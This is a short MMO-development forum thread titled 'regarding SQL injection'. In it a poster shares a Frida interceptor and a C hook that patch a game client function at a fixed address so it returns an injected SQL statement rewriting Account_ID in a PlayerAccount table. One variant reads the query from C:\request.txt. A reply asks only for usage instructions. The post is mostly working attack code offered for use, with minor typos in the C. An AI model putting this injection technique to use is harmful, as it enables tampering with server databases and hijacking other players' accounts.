Welcome!

Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!

Join Today!

regarding SQL injection

Founder of EvilSource
[VIP] Member
Joined
Jun 17, 2010
Messages
323
Reaction score
267
Code:
0x6031C0

Interceptor.attach(ptr("0x6031C0"), {
 onLeave: function(retval){
  var request = "?');update PlayerAccount set Account_ID='ACCOUNT_ID_NEW' where Account_ID='ACCOUNT_ID';--";
  retval.replace(Memory.allocUtf8String(request));
 }
})





RF_O_UP_FUNC_CONTEXT(getMac_hook, 0x6031C0, 0x0); //eax as this
char* read_request(){
 FILE *f = fopen("C:\\request.txt", "r");
 fseek(f, 0, SEEK_END);
 long fsize = ftell(F);
 fseek(f, 0, SEEK_SET);

 char *string = (char*)malloc(fsize + 1);
 fread(string, fsize, 1, f);
 fclose(F);

 string[fsize] = 0;
 return string;
}

void getMac_hook(Context *context){
 int *ptr = (int*)(void*)(context->ESP);
 ptr[5] = (int)(int*)read_request();
}



getMac_hook("update PlayerAccount set Account_ID='ACCOUNT_ID_NEW' where Account_ID='ACCOUNT_ID';--");
 
Junior Spellweaver
Joined
May 9, 2018
Messages
181
Reaction score
126
Domo, while i can tell what this does and so can a few others, a lot of others may not be able to. You should let them know what to do with it.
 
Back
Top